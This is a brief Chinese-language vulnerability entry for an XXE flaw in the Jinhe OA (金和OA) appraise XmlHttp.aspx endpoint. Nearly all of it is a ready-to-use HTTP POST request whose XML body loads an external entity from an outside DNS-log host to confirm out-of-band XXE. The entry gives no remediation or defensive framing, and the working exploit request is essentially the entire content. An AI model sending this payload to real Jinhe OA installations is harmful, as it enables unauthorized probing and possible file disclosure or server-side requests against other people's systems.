漏洞描述
金和OA appraise-XmlHttp XXE漏洞
POST /c6/Jhsoft.Web.appraise/XmlHttp.aspx/ HTTP/1.1
Host:
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxe.dnslog.pt/xxe_test">
%remote;]>
<root/>